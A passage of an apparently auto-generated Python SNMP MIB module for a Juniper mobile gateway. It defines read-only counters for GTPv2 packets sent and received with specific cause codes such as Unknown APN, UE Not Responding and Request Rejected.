jnxMbgSgwGtpV2ICsNoResTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 118), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoResTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoResTx.setDescription('Number of GTP packets sent with cause No Resource.')
jnxMbgSgwGtpV2ICsTFTSMANTErRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 119), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSMANTErRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSMANTErRx.setDescription('Number of GTPV2 packets received with cause TFT Symantic Error.')
jnxMbgSgwGtpV2ICsTFTSMANTErTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 120), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSMANTErTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSMANTErTx.setDescription('Number of GTP packets sent with cause TFT Symantic Error.')
jnxMbgSgwGtpV2ICsTFTSysErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 121), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSysErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSysErrRx.setDescription('Number of GTPV2 packets received with cause TFT System Error.')
jnxMbgSgwGtpV2ICsTFTSysErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 122), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSysErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsTFTSysErrTx.setDescription('Number of GTP packets sent with cause TFT System Error.')
jnxMbgSgwGtpV2ICsPkFltManErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 123), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltManErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltManErrRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Symantic Error.')
jnxMbgSgwGtpV2ICsPkFltManErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 124), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltManErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltManErrTx.setDescription('Number of GTP packets sent with cause Packet Filter Symantic Error.')
jnxMbgSgwGtpV2ICsPkFltSynErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 125), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltSynErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltSynErrRx.setDescription('Number of GTPV2 packets received with cause Packet Filter Syntax Error.')
jnxMbgSgwGtpV2ICsPkFltSynErrTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 126), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltSynErrTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPkFltSynErrTx.setDescription('Number of GTP packets sent with cause Packet Filter Syntax Error.')
jnxMbgSgwGtpV2ICsMisUnknAPNRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 127), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsMisUnknAPNRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsMisUnknAPNRx.setDescription('Number of GTPV2 packets received with cause Unknown APN.')
jnxMbgSgwGtpV2ICsMisUnknAPNTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 128), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsMisUnknAPNTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsMisUnknAPNTx.setDescription('Number of GTP packets sent with cause Unknown APN.')
jnxMbgSgwGtpV2ICsUnexpRptIERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 129), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnexpRptIERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnexpRptIERx.setDescription('Number of GTPV2 packets received with cause Unexpected Repeated IE.')
jnxMbgSgwGtpV2ICsUnexpRptIETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 130), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnexpRptIETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnexpRptIETx.setDescription('Number of GTP packets sent with cause Unexpected Repeated IE.')
jnxMbgSgwGtpV2ICsGREKeyNtFdRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 131), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsGREKeyNtFdRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsGREKeyNtFdRx.setDescription('Number of GTPV2 packets received with cause GRE Key Not Found.')
jnxMbgSgwGtpV2ICsGREKeyNtFdTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 132), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsGREKeyNtFdTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsGREKeyNtFdTx.setDescription('Number of GTP packets sent with cause GRE Key Not Found.')
jnxMbgSgwGtpV2ICsRelocFailRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 133), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRelocFailRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRelocFailRx.setDescription('Number of GTPV2 packets received with cause Relocation Failed.')
jnxMbgSgwGtpV2ICsRelocFailTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 134), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRelocFailTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRelocFailTx.setDescription('Number of GTP packets sent with cause Relocation Failed.')
jnxMbgSgwGtpV2ICsDeniedINRatRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 135), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDeniedINRatRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDeniedINRatRx.setDescription('Number of GTPV2 packets received with cause Denied in RAT.')
jnxMbgSgwGtpV2ICsDeniedINRatTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 136), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDeniedINRatTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsDeniedINRatTx.setDescription('Number of GTP packets sent with cause Denied in RAT.')
jnxMbgSgwGtpV2ICsPTNotSuppRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 137), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTNotSuppRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTNotSuppRx.setDescription('Number of GTPV2 packets received with cause PDN Type Not Supported.')
jnxMbgSgwGtpV2ICsPTNotSuppTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 138), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTNotSuppTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTNotSuppTx.setDescription('Number of GTP packets sent with cause PDN Type Not Supported.')
jnxMbgSgwGtpV2ICsAllDynAdOccRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 139), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAllDynAdOccRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAllDynAdOccRx.setDescription('Number of GTPV2 packets received with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwGtpV2ICsAllDynAdOccTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 140), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAllDynAdOccTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAllDynAdOccTx.setDescription('Number of GTP packets sent with cause Allocated Dynamic Address Occupied.')
jnxMbgSgwGtpV2ICsNOTFTUECTXRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 141), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNOTFTUECTXRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNOTFTUECTXRx.setDescription('Number of GTPV2 packets received with cause UE Context Without TFT Exists.')
jnxMbgSgwGtpV2ICsNOTFTUECTXTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 142), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNOTFTUECTXTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNOTFTUECTXTx.setDescription('Number of GTP packets sent with cause UE Context Without TFT Exists.')
jnxMbgSgwGtpV2ICsProtoNtSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 143), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsProtoNtSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsProtoNtSupRx.setDescription('Number of GTPV2 packets received with cause Protocol Not Supported.')
jnxMbgSgwGtpV2ICsProtoNtSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 144), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsProtoNtSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsProtoNtSupTx.setDescription('Number of GTP packets sent with cause Protocol Not Supported.')
jnxMbgSgwGtpV2ICsUENotRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 145), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUENotRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUENotRespRx.setDescription('Number of GTPV2 packets received with cause UE Not Responding.')
jnxMbgSgwGtpV2ICsUENotRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 146), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUENotRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUENotRespTx.setDescription('Number of GTP packets sent with cause UE Not Responding.')
jnxMbgSgwGtpV2ICsUERefusesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 147), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUERefusesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUERefusesRx.setDescription('Number of GTPV2 packets received with cause UE Refuses.')
jnxMbgSgwGtpV2ICsUERefusesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 148), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUERefusesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUERefusesTx.setDescription('Number of GTP packets sent with cause UE Refuses.')
jnxMbgSgwGtpV2ICsServDeniedRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 149), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServDeniedRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServDeniedRx.setDescription('Number of GTPV2 packets received with cause Service Denied.')
jnxMbgSgwGtpV2ICsServDeniedTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 150), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServDeniedTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsServDeniedTx.setDescription('Number of GTP packets sent with cause Service Denied.')
jnxMbgSgwGtpV2ICsUnabPageUERx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 151), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnabPageUERx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnabPageUERx.setDescription('Number of GTPV2 packets received with cause Unable to Page UE.')
jnxMbgSgwGtpV2ICsUnabPageUETx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 152), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnabPageUETx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnabPageUETx.setDescription('Number of GTP packets sent with cause Unable to Page UE.')
jnxMbgSgwGtpV2ICsNoMemRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 153), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoMemRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoMemRx.setDescription('Number of GTPV2 packets received with cause No Memory.')
jnxMbgSgwGtpV2ICsNoMemTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 154), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoMemTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsNoMemTx.setDescription('Number of GTP packets sent with cause No Memory.')
jnxMbgSgwGtpV2ICsUserAUTHFlRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 155), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUserAUTHFlRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUserAUTHFlRx.setDescription('Number of GTPV2 packets received with cause User AUTH Failed.')
jnxMbgSgwGtpV2ICsUserAUTHFlTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 156), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUserAUTHFlTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUserAUTHFlTx.setDescription('Number of GTP packets sent with cause User AUTH Failed.')
jnxMbgSgwGtpV2ICsAPNAcsDenRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 157), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNAcsDenRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNAcsDenRx.setDescription('Number of GTPV2 packets received with cause APN Access Denied.')
jnxMbgSgwGtpV2ICsAPNAcsDenTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 158), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNAcsDenTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNAcsDenTx.setDescription('Number of GTP packets sent with cause APN Access Denied.')
jnxMbgSgwGtpV2ICsReqRejRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 159), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqRejRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqRejRx.setDescription('Number of GTPV2 packets received with cause Request Rejected.')
jnxMbgSgwGtpV2ICsReqRejTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 160), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqRejTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsReqRejTx.setDescription('Number of GTP packets sent with cause Request Rejected.')
jnxMbgSgwGtpV2ICsPTMSISigMMRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 161), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTMSISigMMRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTMSISigMMRx.setDescription('Number of GTPV2 packets received with cause P-TMSI Signature Mismatch.')
jnxMbgSgwGtpV2ICsPTMSISigMMTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 162), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTMSISigMMTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsPTMSISigMMTx.setDescription('Number of GTP packets sent with cause P-TMSI Signature Mismatch')
jnxMbgSgwGtpV2ICsIMSINotKnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 163), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsIMSINotKnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsIMSINotKnRx.setDescription('Number of GTPV2 packets received with cause IMSI Not Known.')
jnxMbgSgwGtpV2ICsIMSINotKnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 164), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsIMSINotKnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsIMSINotKnTx.setDescription('Number of GTP packets sent with cause IMSI Not Known.')
jnxMbgSgwGtpV2ICsCondIEMsRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 165), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCondIEMsRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCondIEMsRx.setDescription('Number of GTPV2 packets received with cause Conditional IE Missing.')
jnxMbgSgwGtpV2ICsCondIEMsTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 166), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCondIEMsTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCondIEMsTx.setDescription('Number of GTP packets sent with cause Conditional IE Missing.')
jnxMbgSgwGtpV2ICsAPNResTIncRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 167), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNResTIncRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNResTIncRx.setDescription('Number of GTPV2 packets received with cause APN Restriction Type Incompatible.')
jnxMbgSgwGtpV2ICsAPNResTIncTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 168), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNResTIncTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsAPNResTIncTx.setDescription('Number of GTP packets sent with cause APN Restriction Type Incompatible.')
jnxMbgSgwGtpV2ICsUnknownRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 169), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnknownRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnknownRx.setDescription('Number of GTPV2 packets received with cause Unknown.')
jnxMbgSgwGtpV2ICsUnknownTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 170), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnknownTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsUnknownTx.setDescription('Number of GTP packets sent with cause Unknown.')
jnxMbgSgwGtpV2ICsLclDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 171), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsLclDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsLclDetRx.setDescription('Number of GTP packets received with cause Local Detach.')
jnxMbgSgwGtpV2ICsLclDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 172), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsLclDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsLclDetTx.setDescription('Number of GTP packets sent with cause Local Detach.')
jnxMbgSgwGtpV2ICsCmpDetRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 173), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCmpDetRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCmpDetRx.setDescription('Number of GTP packets received with cause Complete Detach.')
jnxMbgSgwGtpV2ICsCmpDetTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 174), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCmpDetTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsCmpDetTx.setDescription('Number of GTP packets sent with cause Complete Detach.')
jnxMbgSgwGtpV2ICsRATChgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 175), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRATChgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRATChgRx.setDescription('Number of GTP packets received with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwGtpV2ICsRATChgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 176), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRATChgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRATChgTx.setDescription('Number of GTP packets sent with cause RAT changed from 3GPP to non 3GPP.')
jnxMbgSgwGtpV2ICsISRDeactRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 177), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsISRDeactRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsISRDeactRx.setDescription('Number of GTP packets received with cause ISR Deactivated.')
jnxMbgSgwGtpV2ICsISRDeactTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 178), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsISRDeactTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsISRDeactTx.setDescription('Number of GTP packets sent with cause ISR Deactivated.')
jnxMbgSgwGtpV2ICsEIFRNCEnRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 179), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsEIFRNCEnRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsEIFRNCEnRx.setDescription('Number of GTP packets received with cause Error Indication from RNC eNodeB.')
jnxMbgSgwGtpV2ICsEIFRNCEnTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 180), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsEIFRNCEnTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsEIFRNCEnTx.setDescription('Number of GTP packets sent with cause Error Indication from RNC eNodeB.')
jnxMbgSgwGtpV2ICsSemErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 181), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSemErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSemErTADRx.setDescription('Number of GTP packets received with cause Semantic Error in TAD Operation.')
jnxMbgSgwGtpV2ICsSemErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 182), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSemErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSemErTADTx.setDescription('Number of GTP packets sent with cause Semantic Error in TAD Operation.')
jnxMbgSgwGtpV2ICsSynErTADRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 183), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSynErTADRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSynErTADRx.setDescription('Number of GTP packets received with cause Syntactic Error in TAD Operation.')
jnxMbgSgwGtpV2ICsSynErTADTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 184), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSynErTADTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsSynErTADTx.setDescription('Number of GTP packets sent with cause Syntactic Error in TAD Operation.')
jnxMbgSgwGtpV2ICsRMValRcvRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 185), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRMValRcvRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRMValRcvRx.setDescription('Number of GTP packets received with cause Reserved Message Value Received.')
jnxMbgSgwGtpV2ICsRMValRcvTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 186), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGtpV2ICsRMValRcvTx.setStatus('current')
